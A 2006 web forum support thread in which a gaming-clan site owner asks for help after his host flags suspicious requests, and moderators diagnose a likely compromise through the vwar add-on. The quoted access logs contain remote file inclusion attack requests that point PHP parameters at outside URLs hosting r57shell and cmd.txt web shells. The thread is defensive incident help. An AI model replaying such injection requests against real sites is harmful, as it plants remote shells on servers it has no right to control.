Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - Other
Author Message
ivellios
New Member
New Member


Joined: Dec 02, 2006
Posts: 2

PostPosted: Thu Dec 07, 2006 11:33 am Reply with quote

Hi Guys!

I have been having some issues with my site lately. KZNClan.com we are a BF2 gaming clan and love your distro.

I am running the latest distro of raven, but I added vwar hiwire from phpnuke-clan. So far I am thinking that that is the problem. We continually get a 400 error message when ever we are leaving the homepage.

First, what is the best way to stop this from happening? Will it help to ban by country as I have seen suggested here?

Second, How can I fix this? I can manipulate the code after I figure out what I am looking for but I am definitely not a script writer. So it usually takes me a few tries to figure out what the script I manipulate is doing. That is my level of experience.

Right now I am thinking that it would be best to upload new copies of everything and then transfer the site to that directory. Will this work?

Lastly, I have to do something quick before 1and1 shuts me down. While we have been busy these last 2 months, we love your product and feel badly about waiting so long to donate. If you can find the time to help me in this problem I will make sure to rectify this oversight and then some.

Here is a part of the e-mail from my host:

access.log.current:201.78.123.141 - - [07/Dec/2006:06:18:54 -0500] "GET
/modules.php?name=News&file=http://schralprider.com/cp/agatsuma/CMD/
r57shell.txt? HTTP/1.1" 200 71 s180249571.onlinehome.us "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; pt-BR) Opera 8.54" "-"

access.log.current:72.232.53.210 - - [28/Nov/2006:13:30:24 -0500]
"GET/modules/vwar/admin/admin.php?vwar_root=http://fuxed.by.ru/cmd.txt?H
TTP/1.1" 200 609 Only registered users can see links on this board! Get registered or login! "-""libwww-perl/5.805" "-"

If there is anymore info you need please let me know.
 
View user's profile Send private message
fkelly
Former Moderator in Good Standing


Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

PostPosted: Thu Dec 07, 2006 1:10 pm Reply with quote

It appears from what you've posted that hackers may have used a hole in your system, perhaps one associated with vwar, to stick a shell script on your system. That's what the r57shell.txt thing is if I'm not mistaken. You might want to use your host's file manager via Vdeck or Cpanel or whatever you have to look thru all the directories and try to locate this and any similar files. Then get rid of them and any modules you've added.

Then, yes you can reload your distribution but it's not going to do any good to do this if you still have programs with security holes there. The hackers will still find them and exploit them.
 
View user's profile Send private message Visit poster's website
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Thu Dec 07, 2006 1:21 pm Reply with quote

"We continually get a 400 error message when ever we are leaving the homepage."

Hmm what page is it going to? That generally doesn't indicate a hacker

However the logs provided do indicate a hack attempt. I'm not surprised if it was vWar that was attacked. It is possible your site may be compromised, your host will need to look at all processes on the server to see if any are malacious. I've seen a lot of bot scripts that will hide as innocent system processes like bash or ls

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
ivellios
PostPosted: Fri Dec 08, 2006 12:01 am Reply with quote

Well if you go to our site and try to go anywhere but the homepage it will show you.

I can go to the admin file though.
 
evaders99
PostPosted: Fri Dec 08, 2006 9:26 am Reply with quote

Code:


INTERNAL SERVER ERROR

An internal server error has occured!


This is where you will need to go to your server's error logs or ask your host.
 
gregexp
The Mouse Is Extension Of Arm


Joined: Feb 21, 2006
Posts: 1497
Location: In front of a screen....HELP! lol

PostPosted: Fri Dec 08, 2006 5:41 pm Reply with quote

Hmm, Is there anything writing to .htaccess?

Most of the time I personally have seen this error has been due to the .htaccess having something written in it that apache conflicts with.

All previous mentioned advice will lead you to this if it is the case, but thought I would drop it in Just incase you're finding it difficult.

_________________
For those who stand shall NEVER fall and those who fall shall RISE once more!! 
View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - Other

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©